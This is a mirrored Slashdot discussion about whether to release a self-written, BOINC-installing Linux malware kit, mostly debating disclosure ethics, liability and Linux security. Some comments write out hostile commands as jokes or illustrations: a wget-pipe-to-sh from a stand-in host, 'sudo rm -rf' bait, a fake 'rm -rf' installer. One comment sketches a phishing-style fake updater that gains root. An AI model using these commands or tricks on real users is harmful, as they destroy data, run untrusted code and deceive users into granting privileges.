Slashdot Mirror
Ethics of Releasing Non-Malicious Linux Malware?
buchner.johannes writes "I was fed up with the general consensus that Linux is oh-so-secure and has no malware. After a week of work, I finished a package of malware for Unix/Linux. Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects. The malware does not exploit any security holes, only loose security configurations and mindless execution of unverified downloads. I tested it to be injected by a PHP script (even circumventing safe mode), so that the Web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files. The aim of the exercise was to provide a payload so security people can 'pwn' systems to show security holes, without doing harm (such as deleting files or disrupting normal operation). But now I am unsure of whether it is ethically OK to release this toolkit, which, by ripping out the BOINC payload and putting in something really evil, could be turned into proper Linux malware. On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary. Technically, it is a nice piece, but should I release it? I don't want to turn the Linux desktop into Windows, hence I'm slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?"
There were two options:
1. Release it anonymously and take no credit
2. Write about it and get some credit (but then you can't actually release it due to legal issues)
You can't (and won't) release it now. If somebody gets attacked with your code, guess who they're going to prosecute and/or sue.
Just releasing linux is an ethical problem. Hell, I can't even print anything since last saturday.
Contact someone at SANS, or Bruce Schneier, or some such. Maybe even someone on the SELinux project; if this non-malicious malware is indeed as capable without SELinux as you claim, and SELinux mitigates/eliminates the danger, this could be good PR for them.
.. but sounds like a lot of work to prove a relatively straight foward point.
It's actually been my opinion that Linux in the hands of someone who doesn't know how to use it can in some situations be less secure than windows.
My reasoning for this is that:
1) Newbie Linux users who are having problems with their systems will rpetty much run anything as any user you tell them to in a desperate hope to get Xorg working again
2) Linux commands on their own can look very cryptic to the uninitiated.. add into that the scripting abilities of most shells.. and a new Linux user won't be able to differentiate a malicious command from one that will get their nvidia driver working again
3) The out-of-box remote admin abilities of Linux are excellent.
4) Standard tools like nc can easily be used to establish out-connecting remote shell sessions
5) OR you can just get them to wget and execute your favourite piece of malware.
Malware can exist for any platform.
However, real actual malware in the wild requires an eco-system to support it. Providing you can compromise a machine proves nothing. Proving that an ecosystem can actually exist on Linux machines would require completely releasing it into the wild, and subjecting innocent people to it.
I don't know about you, but I know where that falls when it comes to ethics and it ain't on the right side of it.
Wasn't SELinux implicated in part of making the mmap_min_addr root exploit even worse a few months ago? In fact, for one of them, I'm pretty sure that it was the cause of it. Just sayin'.
"My other computer is your Linux box"
Everyone who is paying attention knows there are plenty of hacking tools, bots, worms, and virus-like tools for Linux systems already. The only point to be made would be to the basement-dweller fanboys who are willfully ignorant anyway. So go ahead and release it, but don't expect anyone to applaud you for it.
{fingers in ears} La la la la la la la la la la la la la.......
-- I have a private email server in my basement.
Why not treat this code like you would any other proof of concept of a security exploit? if the goal to to prove that security vulnerabilities exist and should be fixed then show this code to whomever it will help actually fix those holes but try not to release it to the public at large while it still represents a real threat. Show it to package and distribution maintainers and make recommendations on how they can improve their security configurations to prevent it from running but don't release it as a build your own rootkit tool if it has served its purpose and people are making a serious effort to address the issues it highlights.
I'm glad you're ethical. The millions of exploits for Windows prove that there are people ready to capitalize on any flaw. How long do you think it'll take them to make this malicious? How long do you think it'd take someone smart to engineer the same thing you did with just your explanation here?
This question is posed as if this is new ground. As if this hasn't been done before - without questions of morality and with distinctly less noble intent. All this worry about inserting a malicious payload is wasted. The script kiddies already have better options at their disposal.
Um, reading this, doesn't it require specific software to be installed to be effective? This does not appear, from what little info is presented, to be a general "hackin' tool" to "pwn newbs". Or maybe it is. Let me know when you can actually get into anything with this. As for releasing it: give it to the devs first. Let them patch things up. Then release it after patches are ubiquitous and discuss how clever you are. Anything else is just plain stupid.
Seriously, what is it with people not knowing right from wrong, or accepting responsibility for their own decisions? You're the one who has to sleep with whatever decision you make - why try to foist the blame on someone else if you decide wrong?
That's like one guy who said "My best friends' girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?" If you're asking, it's because you want to do it and be able to say "don't blame me - everyone said it was okay !"
BTW - Good luck with whatever you decide, but a lot of us have been in the position of being able to do a lot worse, or been offered $$$ to do a lot worse, and you should be thankful we didn't have to get the group-think thing going before refusing.
Two typos in (what was supposed to be) 19 characters. I wish all malware writers were that sloppy.
The state you are in while your HEAD is detached... - wait, what?
Show it to distro developers and repository maintainers, people who do security work, etc. Let them look at it and see if they can defend against it. Don't release it on unsuspecting users, publish the directions to remove it, and defend against it so no one else can do it either. Putting malware in the wild is not the way to get white-hats attention, but it is the way to get black hat's attention. The white hats are usually well behind the black hats with malware that's been released in the wild. Give this to white hats and not black hats.
Post it as security bug against all the distros you've confirmed it works against. That'll attract the attention you want and not the attention you don't.
Perhaps the best action is write and release these tools:
Tool A: It tells the user he has been compromised.
It also saves copies of the files that may be altered.
Tool B: Copies all the old files and MD5s the raw files
and the zipped files. (I think that this is hard
to make both MD5 fake.)
Tool C: Can replace the corrupted files with the save copy.
It may need a password:
If the saved copy can be encrypted with some
password so that it is not easily corruptible.
The real problem is not getting compromised - but not being
able to verify that it has been compromised and
being able to restore it.
Have I missed anything? - A careful user. ./ - read by millions, written by experts
I love
I'm fed up with the general consensus that people are able to walk around outside without being punched in the face. After all, anyone can be punched in the face at any time, so I've been thinking about going up to random people on the street and punching them in the face. People need to learn to take reasonable steps to protect themselves from being punched in the face, such as wearing full-face motorcycle helmets at all times, and how are they going to learn that if I don't show them? But now I'm having second thoughts about whether or not it would be ethical to go around randomly punching people in the face. Does anyone have any advice?
The correlation between ignorance of statistics and using "correlation is not causation" as an argument is close to 1.
Release it and do the same with OS X shortly thereafter.
Any programmer worth a grain of salt could write the same thing at the drop of a hat. I don't
understand where it would be all that interesting.
Got Code?
Which simply shows that the lack of Linux malware isn't because Linux is somehow magically superior, but simply because nobody has taken the time to write any.
Even better, pretty soon we'll have clueless noobs with their new netbooks running Google's ChromeOS (which they don't know is really Linux because Google is doing everything they can to avoid the "L" word). Now they can get pwned too!!
I was fed up with the general consensus that Linux is oh-so-secure and has no malware.
Just because it's a consensus doesn't mean it's correct. As you have demonstrated, it's very much possible to write malware targeted at Linux.
In fact, there are plenty of viruses and malwares specifically targeted at Linux, and their numbers are rising: http://www.internetnews.com/dev-news/article.php/3601946
However, because desktop Linux has an extremely small market share, malware for Linux has a correspondingly tiny market share.
Think of it this way, a few weeks ago you woke up and came up with the idea of writing a piece of potential malware directed at Linux. But there are a hundred who woke up with the same idea, except they wanted to target Windows. In the end, 101 new malwares are born, with only one of them intended to harm Linux systems.
As you said in your own post, compromising a linux box isn't impossible. The code you have isn't all that revolutionary, it's just a demo. Anybody with actual malicious intent would likely know how to make a program like this themselves. Another option would be to set up the system on your server but not release the source, you could demonstrate the weaknesses of *nix without putting anybody in any real danger.
Get in touch with the security community as some other poster said.
Then concentrate in releasing a paper about your software. If your techniques are good, they might be an interesting read. Even more important is that if your software does not escalate privileges (as I understand), cleaning your software should be a straightforward job from the superuser account. Those cleaning techniques will probably be even more interesting.
I'd use a rather obvious payload that reveals itself when interrogated (instead of BOINC) in order to be useful for evaluating system security.
I don't think your malware is as nasty as you think, as you said you relied on executing downloaded software on a world with signed repositories and with MD5 hashes/pgp signatures as a normal custom. I also think you're underestimating the difference between administrator-all-the-time windows way and the only-escalate-when-needed model of the unix world. It would be interesting to see what happens, though.
GPG 0x1B479C78
That's like one guy who said "My best friends' girlfriend wants to sleep with me - should I do it so I can show him what a sl*t she is?"
Of course, why actually sleep with her when you can just brag about her offer on slashdot!
The claim is that a PHP injection on a web server is going to also infect user-owned tarballs and wine executables and root-owned shell scripts without exploiting a privilege escalation hole? Either his webserver is configured to run as root, or this claim doesn't pass the smell test.
http://www.mhall119.com
I'm sure there are some people in the computer security world who you admire. So ask yourself, what would these people do if they had discovered the exploits? What would Phil Zimmermann, or DJB do? Some of these people were unhappy with the current situation, and took their own road and created some good, secure software.
Also, maybe your code isn't as good as you claim. Or maybe it mostly uses known exploits. It's time for a reality check. You should try to find some peers, and discuss it with them to determine how dangerous your product really is.
"Can of worms? The can is open... the worms are everywhere."
We already know how to break into systems with buffer and heap overflows. We know how to do SQL injection into not-so-smart applications. If you work at it you can break into almost anything.
Absolutely no good purpose is served providing a toolkit that allows people to break into naively configured systems. Much of what you describe is akin to leaving the keys in your Maserati with the doors unlocked and the engine running. Please don't make things easier for joyriding teenagers.
If a site wants to know if they're secure, within the current limits of our knowledge, they can perform their own audits, and hire their own advisers to test their systems in a controlled fashion.
Applications, such as BOINC, have an unknown state of security review or audit. I doubt they applied the coding guidelines of CERT, or any of the Common Criteria levels. An administrator would only deploy such applications in the DMZ of their network. To call a Linux system, or Windoze system, secure means you've evaluated the risk of both the operating system and the applications on that system and decided it is good enough for you.
to CERN or some other security group, or to White Hat Hackers who won't release it or use it, but study it and find a way around it.
I would pass it on to some Linux kernel and Linux OS developers, and see if they can fix the security holes you found that allow the hacking of Linux.
If you release it into the public for anyone to download, dollars to doughnuts some idiot is going to replace the Bonic client with a packet sniffer or key logger or something else. It is like inventing a rocket or missile and then someone takes it, steals your design, and then places a WMD in the warhead and launches them at public areas. Just like we wouldn't want technology leaked to Iran, Cuba, Syria, Sudan, North Korea, and other places that could use it for better missiles, guidence systems, encryption, etc some cyber terrorists would use your code to use it for espionage on some Linux web servers run by governments and the military because they thought Linux would be more secure than Windows.
Remember, Slashdot does not have a -1 disagree moderation, and no, troll, flamebait, and overrated are not substitutes.
I'll help you out, just send it in a tarball to me, and I'll verify if it works or not. Oh, I'm sure you want to keep it opensource and all, so just put the source in there too... I'll make sure your given proper credit. Thanks. :)
--- Relax, that mass muderer is just trying to reduce our carbon footprint, one fetus at a time...
yeah, in all it's capitalized glory, that was my opinion right on the title. why so? because there will be time for that, there is enough crappy stuff floating on the intertubes as to release a 'toolkit' that allows to add the whole world of linux servers to the fotm botnet
Well, in general, if you petition a large number of others for advice on a decision you're not sure of, you'll probably be less likely to do something stupid. After all, the general public has a low but well-known level of intelligence, and as an individual you may be stupider than that yourself.
Why do everyone suddenly think he means it's going to be targeted randomly on the internet and he will break into peoples computers?
It's only an example of code that could be created by malicious persons. Purpose is to show people that there is stupid "Linux is 100% secure" thinking among UNIX users and that security needs to be improved there too (or admins should run something like SELinux).
Of course he isn't going to spread it around and attack peoples computers, because that would be illegal. He's just asking if it's a good thing to release such an example.
Yeah, really! Ethics is easy!
Will releasing it make you money? No? Then don't do it.
See how easy that was?
Intellectual Property is a monopolistic, selfish, and defective concept. It is "tyranny over the mind of man"
Security through obscurity isn't. Publish.
Since, despite the popular belief, the idea of a grey/black/white hacker being distinct solely because of intent is, at best, a falsity, the idea that one could release something with the potential of being as destructive as TFS claims is a no-brainer.
The answer is no. Under no circumstances should the package be released.
Because, to release the code is no different than than saying "I only illegally accessed your systems, Mr. FBI, to show you how it could be done. I am honest little boy/girl".
0100010001101001011001 0100100000011010010110 1110001000000110000100 1000000110011001101001 0111001001100101
Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client
It would be nice to see the code. As it stands, I am surprised that this "news" made it this far, with no links of any kind.
No one credible claims that malware is impossible in GNU/Linux or *BSD. In fact, since UNIX is a much more robust networking OS, maintaining a botnet should be helluva lot easier than on Windows. What we have with a free OS, though, is something that proprietary OS users will never have: a complete and total control over our security policy and every other aspect of our software environment. When and if a vector is identified, our security policy will promptly change to nip it in the bud.
A Speculative Example
Lately I've been thinking about one major vector: the human-assisted privilege escalation. Take the latest Ubuntu and imagine a piece of software which runs with user privileges and does the following: it tricks the user into thinking that it is the automatic updater. Lacking in both expertise and time, I am not going to do a proof of concept, but how hard can it be? You just need to draw a window named "Update Manager" using the standard Gnome API, list a few bogus updates anyone would find legit, with version number irrelevant to their day-to-day life (e.g. binutils), wait for the user to click [Install Updates], and then "gksu pwn_you.sh". The user will enter the password, and your work is done. Then, of course, you still need to draw some progress bars to lull the user into believing that an update is going on, but that's all just an icing on the cake.
If anyone can see why this won't work, I would like to hear it.
Looks scary, right? Wrong. Because the solution is as simple as changing the default policy. Make it so that the default behavior is to notify only. On every system update the user should be told: "Go start the updater via the system menu. By the way, if you EVER see an "updater" you didn't start yourself, you are being pwned." Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.
This won't be implemented in Windows. Why? I really cannot guess why Microsoft's security policy seems to be designed from ground up to fuck the user, but it is. The usual excuse seems to be: "it's easy to use". But whatever is the reason, you just cannot make a proprietary platform secure because you cannot pop the hood open. With a free OS, you can.
Post it to the internet with a headline of "Nude Pictures of Brittany Spears!! (Linux only)." Oh, and give it a payload that allows you to pwn the computers it gets downloaded. And then you'll have a Linux botnet!! How cool is that!!
And, next time somebody posts on /. "imagine a beowulf cluster of those" -- well, you'll actually have a beowulf cluster of those.
Oh, and I almost forgot:
3. ???
4. profit!!
Too bad I've already commented on this thread, or I'd mod that up.
But I'll also say that my mother runs Fedora 11, and the SELinux configuration is a lot better than in previous Fedora releases. The SELinux reports are all related to config files in her home directory, and those are carried over from previous Fedora installs. From what I can see, someone got a clue and cleaned up the general Fedora SELinux configuration in a big way.
It's only an example of code that could be created by malicious persons.
Yes that's correct, the question he is asking basically is "should I educate, &/or provide tools to, malicious persons which will enable them to do this in order to prove my point."
Purpose is to show people that there is stupid "Linux is 100% secure" thinking among UNIX users and that security needs to be improved there too (or admins should run something like SELinux).
Yes. All he has to do is balance the good done by showing how stupid some Linux users are against the bad done by enabling malware creation. Which is what he's asking us, collectively, to do for him.
Better to be despised for too anxious apprehensions, than ruined by too confident a security. --Edmund Burke
Who modded this funny? It's insightful, if anything.
What you are contemplating doing is roughly, the digital-electronic equivalent of supplying criminals with maps of wealthy communities, marked with what areas are and are not guarded, where valuables are kept, etc. Don't think that simply because you didn't write a truly malicious payload, that by letting others use a tool you can and should reasonably know will be used for evil purposes you don't share in the culpability, ethically if not legally, even if you don't pull the trigger yourself. ~Hal
Insecurity through stupidity is a common problem on Linux. The Ubuntu forums are full of users wailing that their machines got hacked after they installed FTP, SSH or VNC with a kewl four letter password. One could argue that it is not the users, but rather the Ubuntu developers that are stupid by not configuring PAM to enforce password complexity by default, since it is not really a flaw in 'Linux' per se, but it could certainly be considered to be a dumb-ass flaw in the Ubuntu distribution.
Excuse me, but please get off my Pennisetum Clandestinum, eh!
The exploit relies on "loose execution of unverified downloads"...
Is this the joke about the virus that spreads itself by telling the user "send this email to all your friends then format your hard drive" ?
Once you have code executed on a machine that doesn't have good security, you manage to get local root exploit and then do some "really nasty thing" to persist a reboot?
Please?
Really nasty as in escaping offline IDS?
Publish your kiddie exploit, I'm laughing out loud...
: )
We Linux geeks won't censor you or sue you or something. We're not MS.
It's not a hazard. It's a benefit. We understand.
Colorless green Cthulhu waits dreaming furiously.
Sounds like you have too much time on your hands. Linux and Unix boxes get rooted and kitted all the time, from various security holes in PHP, SQLi, etc. Writing some "greyhat malware" package doesn't really demonstrate anything. It's a well known fact that *nix is still vulnerable to attack, and I really see no relevance to what you're doing. Besides, anyone who runs a locked down system and has any degree of paranoia wouldn't run SETI@Home, Distributed.net or any other similar distributed client software. OSSEC would pick this jazz up in half a second. Congratulations on some questionable bash scripting.
Security through obscurity does not work. If you can write a program there is at least one much less ethical person out there willing to do it as well. The fact we don't see it suggests that people are not motivated or see a benefit in doing it. I suspect much won't happen if you release it. I realize it might also be the case that it is going unreported. Either way it will get developers motivated to fix the issues. See Microsoft for example. So that when Linux becomes a major OS and people will want to freak the systems they will have a much harder time.
>mindless execution of unverified downloads
There is no cure for stupid on any platform.
People will install purple gorillas and cd-drive-cupholders. This is not new.
But beyond user stupidity, there are reasons why propagation of badware on Linux and Unix sucks, and I suggest that people read Tom's excellent rant here: http://slashdot.org/comments.pl?sid=3291&cid=1395315
This situation may not last (c.f., sudo silliness on fedora), but unless you can do a miracle of social engineering, treachery, and underhandedness and get your badware included in the main repositories as source (which repo maintainers and end users use to build packages), you're not going to get very far in the *nix world.
--
BMO
Thank you. You two nailed it.
NB: The message above might reflect my opinion right now, but not necessarily tomorrow or next year.
I don't know...we do a lot of stuff as a collective already, more of it the more "advanced" we are.
One that hath name thou can not otter
If you can truly spread this as easy as possible, then do so. But put a payload into it that closes all the holes it slips through. Proof of concept achieved, morals remain intact.
UTF-8: There and Back Again
I have a strong suspicion that this whole "question" is merely an attempt by Windows marketdroids to spread one of their favorite FUD formulas: "Linux is not really secure, it's just too unpopular to be targeted by malware writers". Please note how often it is mentioned in otherwise content-free comments.
There is no actual "malware". All author claims is that he wrote something that demonstrates the fact that a program executed on a Linux box by a user has that user's access privileges and can do stuff that the user does not expect or like. That's at best a trojan horse -- without capability to gain superuser privileges or compromise other users or hosts, such "malware" is firmly in the range of stupid pranks -- slightly below changing someone's wallpaper to goatse and slightly above asking someone to check out the Last Measure web site. It has nothing to do with millions-strong botnets and hours-to-worldwide-pandemic worms that make Windows such a great platform for crooks and vandals.
Contrary to the popular belief, there indeed is no God.
What it all boils down to is marketshare. I deal with malware from all ends of the spectrum, and the entire purpose of modern malware is usually one thing. To make money. Whether that be by using that machine in a botnet, stealing banking or other logon info, or by trying to get someone to pay for fake security software, malware has turned into (within the last decade) a major business. Due to lack of enforcement, these things mainly stem from countries with little oversight (African countries, Russia, tiny islands etc) And are hard to take down. The reason Linux has not been mass targeted is that it normally represents the higher end of the user spectrum, whereas windows is the low hanging fruit. Take international pickpockets or muggers. The offenders will find the most vulnerable target who is unaware of their surroundings and unable to defend themselves. Windows is a 60 year old lady in a foreign market with her passport and wallet around her neck wearing bright pink taking pictures and not paying attention. Linux is more like an aware person who has made themselves a hard target just by knowing what not to do. Mac's seem to be the exception for the moment, and this is where I actually happen to see a huge potential for this to change though. More and more instead of the family tech having to support a family windows box, it is simply easier to just tell a novice to get a mac. Once this reaches a certain apex, that is when malware will target it. Just about any system can be compromised, but back to my original point is it worth it (money?)
"It's ok, I'm completely secure as long as my iron is off"
I work with AS400 and iSeries machines (and I accept your collective condolences). When I first got trained on them, the teachers told us that OS400 has never been hacked. Not having any real data to confront them, I just let it pass. When we covered the section about user ids and passwords, I found out that 400's force you to disable a user id and password after a certain, finite number of logon attempts. This was by design. All user ids, including system administrator ids had to have some number (I forget how high you can set it) of illegal attempts before the id is locked out. (Usually this is set to 3) They explained, smugly, that this was to keep out intruders.
We further learned that user id's could not be set to more than 10 characters. So I raised my hand and asked what happened if all the user accounts got disabled. They said that IBM would have to back door their way in to unlock a system administrator account, and from that account, others could be reset. (This would be BAD and time consuming, so it was good practice to keep a few SYSADMIN accounts around just in case) I asked if they had ever heard of a denial of service attack. Of course they said. So I asked the obvious question, "What if someone wrote a script to log on to every 10 digit user account 3 times with a blank password?" The reply was "Why would anyone do THAT?"
I pointed out that while I couldn't "hack" their system by their definitions, I could sure as heck turn it into a boat anchor, and do it remotely if it was hooked to the Internet... "Yes, but you can't HACK it was the reply..."
Brawndo: It's what plants crave!
If you are worried about the legal implications, why don't you just present and release it as something like 'automated remote boinc installer'. At that point, it is the decision of the end user whether to use it for it original purpose, or change it for their own purpose(be it legal or illegal). Make sure to release it under a good license that releases you of liability. Do not release it as 'Linux malware', or you probably will get pinned for it.
Yeah, really! Ethics is easy!
Will releasing it make you money? No? Then don't do it.
See how easy that was?
No, no, no. Ethics cannot be based on money because money is only a means to an end not an end in itself. We must fall back on the ethical basis nature gives us as anything else is artificial.
Will it get you laid?
Will it enhance the ability of your children to get laid?
If yes, then you are morally obligated to do it.
You're thinking small. Why miniaturize the laser, when we could instead enlarge the sharks? -John Searle
... is that after a Linux developer writes malware, he/she contributes it to the community. When a Windows developer creates malware, he/she uses it immediately for fun or profit.
Well, in general, if you petition a large number of others for advice on a decision you're not sure of, you'll probably be less likely to do something stupid.
After all, the general public has a low but well-known level of intelligence, and as an individual you may be stupider than that yourself.
Average IQ is 100
Hopefully, IQ is higher on /.
$ make available
Would you be so kind as to open a terminal window mr user and run this for me so that you can join
my cool bot net.
wget www.somewhere.com/somefile.sh -O - | sh
Oh no what will the community do, I may have just released a very serious malware exploit vector.
Got Code?
Then comment your code to that effect.
$ make available
If you release it, you had better release it under the GPL, or it really will be an unethical release...
I don't like Linux. This doesn't make me a troll.
malicious ware? How can something be non-malicious malicious ware? Doesn't that contradict itself? And how does releasing something that does something to someone's computer without their computer considered a good thing?
That's right- I feel smarter just being here.
Lets put it another way. Even if I left my house door wide open, opened all the windows etc. It still does not give you the right to come in and f*ck with my house.
It doesn't give anyone the right to come tamper with your house.
However, if they walk in a door you opened, they haven't "broken in".
They're just trespassing (possibly); hopefully you don't have a doormat that says "Welcome", "Come In", or something such as that.
If you do, then w/ the door held open: you've invited them in.
Non-malicious malware.... Dudware?
Political correctness is really just herd psychology pushed by insecure people who desperately seek social conformity.
Unless you are saying we are all born with an innate ability to determine if all possible actions are right and wrong, and thus also say that all possible actions do in fact have a single, unequivocal answer to the question "Is this right?". If you are saying all of that, sure you are right.
However, if you aren't, then there is good use to discussing ethical issues. If we are finite being incapable of omnipotence, then admitting that we don't know the answer ourselves is a fairly intelligent act compared to flipping a coin. There may be options that one doesn't see on there own, that are far better and will be though up through intelligent discussion.
You might also really want to talk to a lawyer who knows the Computer Fraud and Abuse Act. At a minimum, you may need to worry about 18 USC 1030(a)(5). Pay attention to the definition of "damage" and "loss" in 18 USC 1030(e)(8),(11).
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").
Linux malware that requires manual running is trivially easy to do. /
Copy and paste: sudo rm -rf
Enter your password
Come back when you have malware that can remotely infect a target machine without user interaction.
I say release the ideas, or at least document the concepts with pseudocode so that the average skript kiddie can't just download and modify - they'd at least need to spend the time implementing it in some language.
This way, people qualified to fix the problem can review your proof of concept and fix the problem, but you're limiting the exposure to the average bored 15 year old who's skillset doesn't extend too far beyond downloading a .c file and running gcc.
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
No malware? I think the claim is that Linux doesn't have the threat from viruses that Windows does - actually, it has little threat from them at all.
loose security configurations and mindless execution of unverified downloads - so, the sort of thing no admin with any brains, regardless the OS they were using, would do? The difference is, you can fairly much lock up Linux very fast, with little a non-privileged person can do, while not really limiting what services the machine will offer. With Windows on the other hand, it takes more effort to lock it down, and things become far more burdensome to deal with once you do. Let me tell you how much I loved having errors all over the policy editor in windows because of some basic security settings...which meant that doing normal, everyday windows admin tasks you would be confronted with errors left and right because of the policy settings. Doing normal, everyday UNIX admin tasks on a locked down box though...no issues.
Why do people take the argument so damn personally, anyway? The OSes are meant for different things. That one is better at some things than the other should make sense - they have entirely different methodologies.
PS - it took you a *week* to write something that could exploit "loose security configurations?" Give me 5 minutes and I'll write something. Go ahead and publish whatever you wrote, I'm sure several of us could use the laugh.
You should be BOINC'ing your hot friends, not their computers!
War as we knew it was obsolete
Nothing could beat complete denial
- Emily Haines
Open source it, that way we can all contribute to the malware and discuss if it should use gtk or qt. We know that gnome users will refuse to install anything with qt dependencies and kde users will refuse to install gtk+ dependencies. None of the windows malware coders are willing to release their code to us, so we are limited on integration, especially with wifi. I personally think we should target gnome users, they like stepping on people -- just look at how condescending their logo is. Plus I have a grudge against the way they put their contributers down. Once we get enough malwared machines we can convince windows malware coders to support our platform.
Trying to install linux on my microwave, but keep getting a kernel panic...
"IQ is higher on /."
And more to the point: Hopefully the average intelligence is higher on /.
So you saying that a group of people none of which have an innate ability to determine right from wrong come to better ethical decisions that an individual with the same limitation?
I think you meant "UI through obscurity".
So don't release it. Pretty straight forward if you ask me.
||| I still can't believe Parkay's not butter.
Will it get you laid?
Will it enhance the ability of your children to get laid?
If yes, then you are morally obligated to do it.
"There is no 'right' or 'wrong', 'good' or 'evil'. There is only 'historically correlated with collective survival'."
More seriously, wouldn't that position mean that all birth control is evil (IIRC this actually matches what the roman catholics believe (but obviously for different reasons), plus there's "every sperm is sacred, every sperm is great, when a sperm is wasted god gets quite irate") and that the only proper response when a potential partner wants to use a condom is to secretly poke a hole in it? Somehow, that seems a bit off...
And the person that pulls the trigger not the gun.
Is your Internet Throttled? Install DD-Wrt, OpenWRT or Tomato to learn the truth! Google: 1Gbps/1Gbps: 5 Communities
And if they didn't, I don't think your "malware" is going to destroy Linux community, on the contrary. So go Ahead.
Dear
Negative. Unless I specifically give permission then you still cannot enter. What is so effing hard about that concept for people to grasp?
0100010001101001011001 0100100000011010010110 1110001000000110000100 1000000110011001101001 0111001001100101
It could do more damage :
Boinc is build on voluntary use , meaning a group of people who voluntarily join , making their tiny cpu cycles contribute to a greater goal.
This malware would force someone to join , which is a bit like forcing someone to do charity work : it's commendable , but only if you really want to do it , otherwise it's abuse .
If you had boinc mysteriously appear on your pc , i'm sure you will remove it , and many who would have met boinc in better circumstances , would now never install it anymore.
Slipping shoelaces ?
Negative. Unless I specifically give permission then you still cannot enter.
Surely implied permission will suffice in certain circumstances.
Better to be despised for too anxious apprehensions, than ruined by too confident a security. --Edmund Burke
... Consider the 'Rick Astley' iPhone semi-malware released last month that affected jailbroken iPhones.
Someone's now put a deadlier payload on the same code.
Linux has two main things over Windows:
First one is that people can't accidentally execute some random program they downloaded with their browser. They have to intentionally save it somewhere, chmod +x, then run it. There's no "ok, ok, ok, yes I am stupid" sequence of warning dialog button selections that's going to do that, so it takes very intentional actions to run some random code you got from the web.
The second one is that Linux users don't, as a normal thing, run random programs they downloaded from the web. They generally install packages provided by their distribution. If a Linux user needs a RAR compressor they don't go hunt it around the web, possibly landing on a page offering a trojaned version, they "apt-get install" their distribution's verified version.
The first means people are very unlikely to run your code by accident, the second that you have to provide a good reason to run your malicious code.
I think that all this really proves is that if you really insist on running untrusted code on your system it can go and screw with your system (or user account). Well, duh. The question isn't whether it can happen at all, it's how easily it can happen by accident or lack of attention. If the user really insists on shooting their foot there's little anybody can do about that.
But, suppose that Linux got lots of stupid desktop users, who'd download fluffy_kittens.sh and actually go through the steps they need to run it. In that case distributions could add some extra security quite easily, by for instance denying the user the ability to run programs from non-root owned directories (grsecurity does this). This would make it so that even if the user does download your script, sets the permissions, and tries to run it, it will fail to work anyway.
Now of course there's the ld.so workaround, but that's not going to happen from the GUI, and the distribution could always patch their ld.so to obey the grsecurity restrictions
Given all this, IMO, this exercise proves very little. It proves that if you manage to convince the user to intentionally run untrusted code, it'll be able to do nasty things. But this is a given on any system that's not locked down in a really fascist manner. It'll take a cell phone-like environment with sandboxed applications to defeat that. And even there applications must be allowed to do potentially harmful things to be able to do some entirely legitimate functions.
At that point you have two possibilities: you completely refuse to run unsigned code (pissing off the user), or ask the user "do you want to let this program delete all your data?" and allow them to shoot their own foot.
There is no implied permission to enter private property, only explicit.
That is the exact opposite of what I was taught at Law School.
Better to be despised for too anxious apprehensions, than ruined by too confident a security. --Edmund Burke
It's an obvious lie. Nobody here has a friend with a girlfriend.
IANAL doesnt apply to you then? Wow, i thought it applied to everyone on slashdot.
You are entitled to your own opinions, not your own facts.
It's not a complex concept. It's just a factually incorrect one.
Uhh no its retarded and was modded funny as a result. Security through obscutiry has been debunked dozens of times. Mac OS for instane is pretty visable, but yet seems to have not even a fraction of the problems another major commercial OS does. And don't tell me there isn't a major bonus for being the hacker to really pwn OS X. I'm sure as a Windows troll you would give a nut for this kind of exploit just to prove this lame claim. Vista and W7 are a HUGE step forward, but don't pretend that the only reason everybody else is safe and Windows is a spyware dungeon is just based on marketshare.
This is an important milestone in the Linux to the Desktop campaign.
Without a "healthy malware ecosystem", Linux isn't mature enough to be called a desktop operation system.
Think about the AV industry!
Patents Drive Free Software as Hurricanes Drive Construction Industry
Only if you lied to the police and told them that the person broke in, but you will definitely have to provide more an explanation than that.
Or they refused to leave when you told them to.
The police certainly won't do anything to them unless you actually reported an incident, and made certain representations (which could be true or not, however lying to the police: possibly an even more severe crime than trespass).
They could show the marketing materials, pamphlets, they were carrying, and the police would not arrest them, once it became clear that they were indeed a salesman trying to get your intention, who happened to walk in an open door (due to the implicit invitation).
You might even have a case if you caught them rummaging in your pantry -- as that suggests an intent to convert some of your property (even if just a small snack).
However, simply walking through an open door, is no crime, when there is implicit invitation involved.
In fact, at many homes... there will be a mostly enclosed screen porch, and it's necessary to pass through an open door just to ring the bell.
However, if they walk in a door you opened, they haven't "broken in".
Actually... they have. "Breaking and entering" apparently doesn't require any actual breaking. Of course, if you explicitly opened the door and held it for them, that's implied permission to enter. But if they just left their door open and you wandered in, they can be charged with breaking and entering.
Rampant carbon sequestration destroyed the Dinosaurs' tropical paradise. I'm here to help repair the damage.
I've always thought it was hard enough to get apps and services I do want to install and get going on linx that some random piece of malware has no chance.
Install and Run Instructions ./LinuxMalware1.0.exe.sh
/
==================
chmod a+x
su -c "./LinuxMalware1.0.exe.sh"
Script
==========
#!/bin/bash
rm -rf
exit(0)
The Point
=============
If you are running things from an untrusted source then you are a dumb-ass.
There is no patch for human stupidity.
http://www.rocketdownload.com/software/rar.html
IANAL doesnt apply to you then? Wow, i thought it applied to everyone on slashdot.
Yes, amongst other things, IAAL (nor the only one who reads here), but I can say IANAAL (last 'A' for American). And note that what I said it that it was the exact opposite of what I was taught at Law School. I would not presume to tell OP he is wrong in regard to in his own jurisdicition. But in my jurisidiction there are instances where an implied permission to enter property and premises will be presumed. For example, we are allowed to knock on people's doors (unless a sign explicitly negates the legal presumption of implied permission to enter), and where I live, we also have a Fire Service who regularly enter premises without the explicit permission of the occupiers and pull them out to safety (though they probably have, in addition, a statutory right to do so).
But getting back on topic, this isn't an actual housebreaking. It's a housebreaking HOWTO.
Better to be despised for too anxious apprehensions, than ruined by too confident a security. --Edmund Burke
Really?
Non-MALicious MALware?
Its awesome to see non-malicious malicious software for Linux.
Way to go the kdawson, your reading comprehension skills are just freaking top notch.
